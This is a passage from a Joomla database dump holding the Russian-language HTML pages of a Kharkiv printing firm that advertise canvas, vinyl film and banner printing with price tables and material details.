/></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-size: small;\">При заказе от <span style=\"font-size: medium;\"><span style=\"color: #ff0000;\">десяти</span></span> картин  скидка <span style=\"font-size: medium;\"><span style=\"color: #ff0000;\">10%</span></span>. </span></p>\r\n<p> </p>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\">Холст как фотообои - интересное в интерьере!</span></span></p>\r\n<p><img src=\"images/stories/romawki.jpg\" border=\"0\" width=\"242\" height=\"121\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Иногда холст можно применять для поклейки на стены в интерьере вместо фотообоев. <br /><br /><strong>Преимущество холста</strong> перед фотообоями состоит в том, что максимальная ширина рулона 2,1м, в отличии от 1,3м. в обоях.<br />Таким образом можно обклеить стену с меньшим количеством стыков или вообще без них! <br /><br />Можем напечатать цельный размер, <strong>шириной до 2,1м</strong> и <strong>длинной до 25м</strong>.</p>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\">5 ЗА печати на холсте:</span></span></p>\r\n<p><span style=\"color: #0000ff;\"><strong>1. </strong></span>Высококачественный холст<br /><span style=\"color: #0000ff;\"><strong>2.</strong></span> Высокое качество печати и яркие цвета красок<br /><span style=\"color: #0000ff;\"><strong>3.</strong></span> Долгий срок службы - краски не выгорают<br /><span style=\"color: #0000ff;\"><strong>4.</strong></span> Отличное украшение интерьера<br /><span style=\"color: #0000ff;\"><strong>5.</strong></span> Отличная идея подарка</p>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\">Печать на холсте в ЭкваторПринт это:</span></span></p>\r\n<span style=\"color: #0000ff;\"><span style=\"font-size: small;\">?</span></span> уникальная фактура «живого» холста.                                                                                             \r\n<ul>\r\n</ul>\r\n<ul>\r\n</ul>\r\n<p style=\"text-align: left;\"><span style=\"color: #0000ff;\"><span style=\"font-size: small;\">?</span></span> цветная печать с <strong>разрешением</strong> <strong>1440 dpi</strong><span style=\"color: #0000ff;\"><span style=\"font-size: small;\"><br />?</span></span> современное японское  оборудование;<span style=\"color: #0000ff;\"><span style=\"font-size: small;\"><br />?</span></span> долговечность холста и печати на холсте - со временем <strong>краски не тускнеют и не осыпаются<br /></strong><span style=\"color: #0000ff;\"><span style=\"font-size: small;\">? </span></span>\"приятная\" цена на печать, <strong>скидки при крупных заказах</strong> и постоянным клиентам</p>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\">Цена <span style=\"font-size: x-small;\">(без натяжки на подрамник)</span><br /></span></span></p>\r\n<p><span style=\"font-size: small;\"><span style=\"color: #000000; line-height: normal; text-align: justify;\"><span style=\"color: #000000; text-align: justify; line-height: 1.3em;\">При печати <strong>до</strong></span><strong style=\"color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; text-align: justify; line-height: 1.3em;\"> <span style=\"font-size: small;\">5м2</span></strong><span style=\"color: #000000; text-align: justify; line-height: 1.3em;\"> - цена 230 грн/м2</span> </span><br style=\"color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; line-height: normal; text-align: justify;\" /><span style=\"color: #000000; text-align: justify; line-height: 1.3em;\">При печати <strong>от</strong> </span><strong style=\"color: #000000; text-align: justify; line-height: 1.3em;\">5м2</strong><span style=\"color: #000000; text-align: justify; line-height: 1.3em;\"><span style=\"font-size: small;\"> </span>- цена 250 грн/м2</span></span><br style=\"color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; line-height: normal; text-align: justify;\" /></p>\r\n<p><strong style=\"line-height: 1.3em;\">Ширина холста может быть:</strong></p>\r\n<p>- 1,07 м<br /> - 1,27 м<br /> - 1,52 м<br /> - 2,1 м</p>\r\n<p><a href=\"http://ekvatorprint.com.ua/\" title=\"широкоформатная печать Харьков\"><strong>Широкоформатная печать</strong></a> на холсте отличный способ красиво и оригинально украсить интерьер.<br /><br /><strong>Холст</strong> широко используется для декорирования салонов, офисов, магазинов, кафе и квартир.</p>\r\n<p>Широкоформатная <a href=\"http://www.pieraccini.com/en/production.asp\" title=\"итальянский художественный холст\">печать на холсте</a> может помочь вам создать оригинальный подарок, который будет достойным украшением любого интерьера. Для печати на холсте можно использовать как фотографии (свадебные, фото родных и т.п.), так и изображения картин. <br />Таким образом вы можете создать холст отображающий миг современной жизни или воссоздать произведение великих художников - сделать репродукцию картины.</p>\r\n</td>\r\n</tr>\r\n<tr style=\"background-color: #6699cc;\">\r\n<td style=\"height: 2px;\"></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: justify;\" colspan=\"4\"><br /><img src=\"images/stories/kraski.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"50\" style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" />Другие услуги широкоформатной печати выполняемые в \"ЭкваторПринт\":<br /><br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\">печать на виниле (на пленке)</a> - долгий срок службы<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"изготовление баннера\">изготовление баннера</a> на прочных материалах<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\" title=\"печать флагов\">печать флагов</a> - имиджевая реклама<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать фотообоев\">печать фотообоев</a> - теперь ваш дом будет максимально оригинален<br /> - <a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"широкоформатная печать ситилайтов\">печать сити лайтов</a>, наружная реклама вдоль дорог<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\">печать на сетке баннерной</a> - для легкой полупрозрачной рекламы<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной рекламы\">изготовление наружной рекламы</a> - виды наружной рекламы осуществляемой в \"ЭкваторПринт\" (реклама на улицах, магазинах, вывески, билборды и т.д.)<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\" title=\"печать больших фотографий\">печать больших фотографий </a>- украсьте свой интерьер<br /></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2010-12-01 19:47:48',62,'','2015-11-16 10:22:12',62,0,'0000-00-00 00:00:00','2010-12-01 19:47:48','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',108,0,22,'печать на холсте, печать фотографий, широкоформатная печать на холсте, печать на холсте харьков','Печать на холсте в Харькове. Распечатать фото на холсте (картина по фотографии). Все делаем в готовом виде, холст натянут на подрамник и выглядит как картина.',0,53056,'robots=\nauthor='),(7,'Печать на виниле','2010-12-01-19-57-30','','<table style=\"width: 600px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1 style=\"text-align: center;\">Печать на виниле, самоклейке (оракале)</h1>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Полиграфия Экваторпринт осуществляет печать <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины</strong> в сроки <strong>1-3 дня.</strong></p>\r\n<p><span style=\"color: #0000ff;\"><span style=\"font-size: medium;\"><strong>Цена печати (фотокачество):</strong></span></span></p>\r\n<table style=\"width: 695px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<colgroup><col width=\"309\"></col> <col width=\"171\"></col> <col width=\"87\"></col> <col span=\"2\" width=\"64\"></col> </colgroup> \r\n<tbody>\r\n<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n<td rowspan=\"2\" width=\"309\" height=\"60\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Материал</strong></span></span></td>\r\n<td rowspan=\"2\" width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Ширина рулона</strong></span></span></td>\r\n<td rowspan=\"2\" width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Плотность(г/м2)</strong></span></span></td>\r\n<td colspan=\"2\" width=\"128\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Стоимость(грн./м2)</strong></span></span></td>\r\n</tr>\r\n<tr style=\"background-color: #172983; height: 20px; text-align: center;\">\r\n<td width=\"64\" height=\"20\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>до 10м?</strong></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>от   10</strong></span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"40\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"40\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">Самоклеющаяся пленка FotoJet </span></span></span></td>\r\n<td width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">1.04/1.24/1.48</span></span></span></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">120</span></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">71</span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">61</span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"20\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"20\"><br /></td>\r\n<td width=\"171\"><br /></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"> </span></span></td>\r\n<td width=\"64\"><br /></td>\r\n<td width=\"64\"><br /></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"20\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"20\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">Самоклеющаяся пленка перфорированная One Way Vision</span></span></span></td>\r\n<td width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">1.04/1.24/1.48</span></span></span></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">120</span></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">116</span></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">102</span></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\"><strong>Заказать печать:</strong></span></span></p>\r\n<p><span style=\"font-size: small;\">Принимаем заказы по звонку или по e-mail.</span><br /><br /></p>\r\n<p> </p>\r\n<hr />\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<p><img src=\"images/stories/vinil-big.jpg\" border=\"0\" alt=\"печать на виниле\" title=\"печать на виниле\" width=\"250\" style=\"margin: 5px; float: left; border: 1px solid grey;\" /></p>\r\n<p>В недавнем прошлом винил широко использовался для изготовления пластинок на проигрыватели. Сегодня это уже прошедший этап, и виниловые пластинки используют только любители старины и современные диджеи.</p>\r\n<p>В наши дни винил особо популярен в <a href=\"/\" title=\"широкоформатная печать Харьков\">широкоформатной печати</a>, в украшении авто, и в <a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной рекламы\">изготовлении наружной рекламы</a> на транспорте.</p>\r\n<p style=\"text-align: justify;\"><strong>Печать на виниле (на пленке) широко применяется для изготовления следующих видов наружной рекламы:</strong></p>\r\n<p>- баннер<br />- уличная      растяжка<br />- реклама      на авто <br />- украшение авто<br />- аппликации      на окнах</p>\r\n<p style=\"text-align: justify;\"><strong>Печать на виниле – стала популярной благодаря целому ряду преимуществ:</strong></p>\r\n<p style=\"text-align: center;\"><img src=\"images/stories/vinil-avto.jpg\" border=\"0\" alt=\"печать на виниле\" title=\"печать на виниле\" width=\"200\" style=\"float: right; margin: 5px; border: 1px solid grey;\" /></p>\r\n- высокое      качество<br />- быстрые      сроки изготовления<br />- долговечность<br />- низкая      стоимость\r\n<p style=\"text-align: justify;\">Такой вариант рекламы особо прочен, и практически не поддается повреждениям. <br />Срок службы виниловой самоклеющейся пленки 3-7 лет.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<p><span style=\"font-size: medium;\">Креативная реклама с помощью нанесения на транспорт самоклеющейся пленки:</span></p>\r\n<p>Реклама зоопарка:</p>\r\n<p><img src=\"images/stories/kreativnaja-reklama/avto/pechat-na-plenke-zoo.jpg\" border=\"0\" alt=\"печать на самоклейке\" title=\"печать на самоклеющейся пленке\" width=\"600\" height=\"283\" /></p>\r\nРеклама шоколадного батончика:<br />\r\n<p><img src=\"images/stories/kreativnaja-reklama/avto/pechat-na-plenke-mars.jpg\" border=\"0\" alt=\"печать на самоклейке\" title=\"печать на самоклеющейся пленке\" width=\"600\" height=\"343\" style=\"border: 0pt none;\" /></p>\r\n<br /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h2 style=\"text-align: center;\">Печать на оракале</h2>\r\n<p style=\"text-align: justify;\"><strong>Что такое оракал…</strong></p>\r\n<p style=\"text-align: justify;\"><br /><strong><img src=\"images/stories/pechat-na-orakale.gif\" border=\"0\" alt=\"печать на оракале\" title=\"печать на самоклейке - оракале\" style=\"float: left; margin: 5px;\" />Оракал</strong> – это марка фирмы производителя  самоклеющейся пленки (самоклейки).  Данная компания была одной из первых, выпустивших такой вид продукции. Поэтому, до сих пор, многие считают, что «оракал» это синоним «самоклеющейся пленки».<br /><br />На самом же деле <a href=\"http://www.orafol.com\" target=\"_blank\" title=\"orafol\">оракал</a> – это виниловая пленка с самоклеющейся основой, которая производится в Германии компанией <strong>Oracal</strong>.<br /><br />На сегодняшний день фирм изготовителей самоклеющейся пленки много, однако оракал остается на пике популярности.<br /><br /><strong>Печать на оракале</strong> – это высокоэффективная технология, которая применяется для создания рекламных, дизайнерских  и информационных продуктов. <br /><br /><strong><span style=\"color: #0000ff;\">Широкие возможности применения самоклеющейся пленки достигаются за счет ее отличных характеристик: </span></strong><br /><span style=\"color: #0000ff;\"><span style=\"font-size: 20px;\">?</span></span> При полноцветной печати на самоклейке, краска наносится быстро, «ложится» качественно, тем самым обеспечивается  яркое, четкое и насыщенное изображение;<br /><span style=\"color: #0000ff;\"><span style=\"font-size: 20px;\">?</span></span> самоклеящаяся пленка оракал характеризуется высокой прочностью и стойкостью. Она хорошо переносит перепады температур, погодные условия и много других факторов влияния внешней среды. При этом внешний презентабельный вид не изменяется.<br /><br /><span style=\"font-size: medium;\">На сегодняшний день, с помощью самоклеющейся пленки и  возможностями современной полиграфии можно достичь поистине удивительных и неповторимых решений.<br /></span><br /><span style=\"color: #0000ff;\"><strong>Печать на оракале для краткосрочной (интерьерной) рекламы</strong></span><br /><br />Печать на самоклейке большого формата для интерьера, идеально подходит для производства краткосрочной рекламы эконом, и для долго служащей рекламы. <br /><br />При печати краткосрочной рекламы, как правило, выбирается эластичная пленка ПВХ, на которую «легким» слоем наносится особый клей, позволяющий быстро и качественно отклеивать пленку по окончании рекламной акции. Такой вариант отлично подходит для проведения непродолжительных промо-акций, оформления распродаж. Выставочных стендов, указателей и другой подобной продукции.<br /><br /><span style=\"color: #0000ff;\"><strong>Печать на оракале для длительного применения</strong></span><br /><br />При печати рекламы, рассчитанной на продолжительное использование выбирается более прочный вид пленки. Такая основа подходит для изготовления наружной рекламы, потому как внешнему виду плотного и стойкого оракала не страшны практически никакие погодные условия. <br /><br />В изготовлении наружной рекламы мы можем предложить использование прозрачной и полупрозрачной светорассеивающей пленки, используемой для витражей и конструкций с внутренней подсветкой.<br /><br /><br />Как вы видите, печать на самоклеющейся пленке Oracal дает неограниченные возможности в производстве рекламной продукции. Полиграфическая компания <strong>ЭкваторПринт</strong> – профессионал в изготовлении наружной рекламы на любом из материалов, в особенности на самоклейке оракал.<br /><br />Мы выполняем печать в городе <strong>Харьков</strong>, а также осуществляем доставку по всей Украине, поскольку далеко не в каждом городе найдется полиграфия с такими возможностями и качеством печати как в Экваторпринт.<br /><br /></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h4>Печать на самоклеющейся пленке и реклама на транспорте</h4>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/vinil-bus.jpg\" border=\"0\" width=\"200\" style=\"margin: 5px; float: left; border: 1px solid grey;\" />Общественным  транспортом в городе Харьков пользуются около 70% процентов населения,  да еще к ним добавляют приезжие. А поскольку возможности широкоформатной  печати широки, то реклама на транспорте – без сомнения эффективный  инструмент привлечения конкретного потребителя.</p>\r\n<p style=\"text-align: justify;\">По среднестатистическим данным, в месяц общественным транспортом  пользуется 75% харьковчан. И очевидно, что и пассажиры транспорта и  прохожие на улицах, обязательно обратят внимание на наружную рекламу на  транспорте.<br /> <br /> Аккуратную рекламу на транспорте делают с помощью печати на виниле, которая выполняется в высоком качестве, с соблюдением яркости цветов, дизайна и  форм. Поэтому, вы можете не ограничивать свою фантазию продумывая  внешний вид транспортной рекламы.</p>\r\n<p style=\"text-align: justify;\"><strong>Печать на виниле</strong> для транспорта предполагает большие размеры и  местами полупрозрачный материал (там, где предполагаются окна, мы выполним печать на полупрозрачном  материале - сетке.). Делая заказ в полиграфии  ЭкваторПринт - вы получите ожидаемый результат высокого качества.</p>\r\n<p style=\"text-align: justify;\">Реклама на транспорте имеет следующие преимущества:</p>\r\n<p style=\"text-align: justify;\">- Охват большого процента аудитории <br /> - Лояльное восприятие потребителем <br /> - Период действия рекламы до 16-18 часов в сутки <br /> - Возможность установки на любом маршруте, линии метро</p>\r\n<p><strong> </strong></p>\r\n<h4>Печать на виниле для личного авто</h4>\r\n<p style=\"text-align: justify;\"><strong><img src=\"images/stories/vinil-mawina.jpg\" border=\"0\" width=\"200\" style=\"float: left; margin: 5px;\" />Печать на виниле</strong> для личного транспорта придает авто индивидуальность. Это новая ступень  творчества и средство для самовыражения владельцев машин. Печать на пленке для авто, может сделает ваш транспорт красочным и заметным – вы будете сразу выделяться на фоне других авто. Или же лишь слегка приукрасить транспорт, добавив рисунок с оттенком основного цвета машины.</p>\r\n<p style=\"text-align: justify;\">Печать на виниле выполняется на эластичной пленке с глянцевой или  матовой поверхностью. Винил  не боится ни воды, ни грязи.  Температурный режим виниловой пленки допустим в пределах –40 °С до +80  °С, поэтому температурные условия нашего региона абсолютно не помеха. Винил сохраняет свой презентабельный вид около 3 – 7  лет.</p>\r\n</td>\r\n</tr>\r\n<tr style=\"background-color: #6699cc;\">\r\n<td style=\"height: 2px;\"></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><img src=\"images/stories/kraski.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"50\" style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" />В \"ЭкваторПринт\" вы также можете заказать изготовление таких услуг, как:<br /><br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\">печать на холсте</a> - хороший способ оформить интерьер<br /> - <a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"изготовление баннера\">изготовление баннера</a> - наружная реклама на зданиях<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\">печать на сетке баннерной</a> - полупрозрачная реклама на транспорте ил изданиях<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной рекламы\">изготовление наружной рекламы</a> - \"ЭкваторПринт\" качественно изготовит наружную рекламу нужного вам формата<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать фотообоев\">печать фотообоев</a> - сделайте свой дом согласно своему вкусу<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\" title=\"печать флагов\">печать флагов</a> - стиль вашей компании<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"широкоформатная печать ситилайтов\">печать сити лайтов</a>, современная эффективная наружная реклама<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\" title=\"печать больших фотографий\">печать больших фотографий </a>- для выставок, для интерьера<br /></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2010-12-01 19:56:58',62,'','2015-11-03 07:56:02',62,0,'0000-00-00 00:00:00','2010-12-01 19:56:58','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',90,0,21,'печать на самоклейке, печать на оракале, печать на самоклеющейся пленке, печать на виниле, пленка печать','Печать на виниле (пленке), самоклеющейся пленке (самоклейке) оракале - в Харькове. Доставка по всей Украине',0,36306,'robots=\nauthor='),(8,'Баннер печать','2010-12-01-20-03-24','','<table style=\"width: 600px; text-align: justify;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1 style=\"text-align: center;\">Печать на баннере</h1>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Полиграфия Экваторпринт осуществляет печать на баннере <strong>в Харькове</strong>. <br />Доставка осуществляется в Киев и <strong>во все города Украины</strong> в сроки <strong>1-3 дня.</strong></p>\r\n<p><span style=\"color: #0000ff;\"><span style=\"font-size: medium;\"><strong>Цена печати:</strong></span></span></p>\r\n<table style=\"width: 695px;\" border=\"1\" cellspacing=\"2\" cellpadding=\"2\">\r\n<colgroup><col width=\"309\"></col> <col width=\"171\"></col> <col width=\"87\"></col> <col span=\"2\" width=\"64\"></col> </colgroup> \r\n<tbody>\r\n<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n<td rowspan=\"2\" width=\"309\" height=\"60\"><span style=\"font-size: small;\"><strong><span style=\"color: #ffec00;\">Материал</span></strong></span></td>\r\n<td rowspan=\"2\" width=\"171\"><span style=\"font-size: small;\"><strong><span style=\"color: #ffec00;\">Ширина рулона</span></strong></span></td>\r\n<td rowspan=\"2\" width=\"87\"><span style=\"font-size: small;\"><strong><span style=\"color: #ffec00;\">Плотность<br />(г/м2)</span></strong></span></td>\r\n<td colspan=\"2\" width=\"128\"><span style=\"font-size: small;\"><strong><span style=\"color: #ffec00;\">Стоимость<br />(грн./м<sup>2</sup>)</span></strong></span></td>\r\n</tr>\r\n<tr style=\"background-color: #172983; height: 20px; text-align: center;\">\r\n<td width=\"64\" height=\"20\"><span style=\"font-size: small;\"><strong><span style=\"color: #ffec00;\">до 10м</span></strong></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><strong><span style=\"color: #ffec00;\">от   10</span></strong></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"40\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"40\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">Баннерная ткань ламинированная </span></span></td>\r\n<td width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">3.15/2.15/1.55/1.05</span></span></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">440</span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">72</span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">62</span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"20\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"20\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">Баннерная ткань литая </span></span></td>\r\n<td width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">3.15/2.05/1.55/1.05</span></span></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">510</span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">100</span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">87</span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"20\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"20\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">Сетка баннерная</span></span></td>\r\n<td width=\"171\"><span style=\"color: #003300; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: small; line-height: normal; text-align: center;\">3.15</span><br /></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\">270</span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">100</span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">87</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\"><strong>Заказать печать баннера:</strong></span></span></p>\r\n<p>Принимаем заказы по звонку или по e-mail.<br />Печать осуществляем в тот же день при заказе в первой половине дня.</p>\r\n<p> </p>\r\n<hr />\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/banner-big.jpg\" border=\"0\" alt=\"изготовление баннера\" title=\"изготовление баннера\" width=\"250\" style=\"float: left; margin: 5px; border: 1px solid grey;\" /><strong>Баннер</strong> - это графическое изображение рекламного характера.</p>\r\n<p style=\"text-align: justify;\">Печать на <a href=\"http://ru.wikipedia.org/wiki/%D0%91%D0%B0%D0%BD%D0%BD%D0%B5%D1%80%D0%BD%D0%B0%D1%8F_%D1%82%D0%BA%D0%B0%D0%BD%D1%8C\" target=\"_blank\" title=\"Баннерная ткань\">баннерной ткани</a> - это идеальный вариант для привлечения клиентов и брендирования компании.</p>\r\n<p style=\"text-align: justify;\">Для того чтобы произвести на своих потенциальных клиентов хорошее впечатление, печать должна выполняться на качественном материале с использованием ярких красок, которые будут привлекать к себе взгляды и внимание.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<h2 style=\"text-align: justify;\"><strong>Решив заказать печать на баннере в \"ЭкваторПринт\" - вы делаете верный выбор!</strong></h2>\r\n<p style=\"text-align: justify;\">Наши основные преимущества: высокое качество и быстрые сроки!</p>\r\n<h3 style=\"text-align: justify;\">Материал баннера</h3>\r\n<p style=\"text-align: justify;\"><strong> </strong>Варианты материала печати:</p>\r\n<ul>\r\n<li>Ткань баннерная ламинированная (глянец/мат) непросветная</li>\r\n<li>Ткань литая матовая непросветная</li>\r\n<li>Ткань просветная \"Бэклит\"</li>\r\n<li>Сетка</li>\r\n</ul>\r\n<h3 style=\"text-align: justify;\">Размер баннера</h3>\r\n<p style=\"text-align: justify;\">Печать осуществляется яркими, стойкими к  внешней среде красками на материале <span style=\"font-size: small;\">шириной <strong>1,1/1,6/2.1/3.2 метра</strong></span></p>\r\n<p style=\"text-align: justify;\">Также мы предоставляем услугу - \"<strong><span style=\"font-size: small;\">сварка баннерной ткани</span></strong>\".<br />Поэтому, баннера могут быть любых необходимых размеров.</p>\r\n<h3 style=\"text-align: justify;\">Цена печати баннера</h3>\r\n<p><a href=\"index.php?option=com_content&amp;view=article&amp;id=2&amp;Itemid=3\" title=\"баннер печать цена\">Цена баннер печати</a> указана в разделе прайс-лист.<br />Цена формируется согласно вашему заказу и зависит от выбранного материала, его ширины, объема печати.</p>\r\n<h2 style=\"text-align: justify;\">Монтаж баннера</h2>\r\n<p style=\"text-align: justify;\">Компания ЭкваторПринт - предлагает свои <strong><span style=\"font-size: small;\">услуги в установке баннеров на фасады зданий</span></strong>.<br />Таким образом, обратившись к нам за изготовлением, вы решите сразу два вопроса: и печать осуществите, и о монтаже беспокоиться не придется.</p>\r\n<h3 style=\"text-align: justify;\">Требования к макету баннера</h3>\r\n<p>Макет принимается в формате TIFF в натуральном размере. Разрешение файла должно быть от 20 до 150 точек на дюйм. Макет принимается как в режиме CMYK, так и в RGB. Перед заказом услуги, можно заказать бесплатную цветопробу.</p>\r\n<p>ЭкваторПринт всегда гарантирует точную цветопередачу и яркие насыщенные цвета.</p>\r\n<h3>Про изготовление баннеров</h3>\r\n<p>Баннеры бывают нескольких видов:</p>\r\n<ul>\r\n<li>без каркаса </li>\r\n<li>с металлическим каркасом. </li>\r\n</ul>\r\n<p>Изготовление осуществляется путем широкоформатной печати на необходимом материале. Однако, иногда его изготавливают методом аппликации самоклеющейся пленки.<br /> <br /> На сегодня это самый популярный вид  наружной рекламы - он заметен за счет своих масштабов, яркий и воздействует на максимально большое количество аудитории.</p>\r\n<p><span style=\"font-size: medium;\">Креативная реклама с помощью баннера:</span></p>\r\n<p>Баннер для рекламы под слоганом - \"Кока-кола в каждый дом\":<br /><img src=\"images/stories/kreativnaja-reklama/koka-kola-v-ofis.jpg\" border=\"0\" width=\"600\" height=\"300\" /><br /><br />Реклама сериала \"Закон и порядок\":<br /><img src=\"images/stories/kreativnaja-reklama/pechat-na-bannere-serial.jpg\" 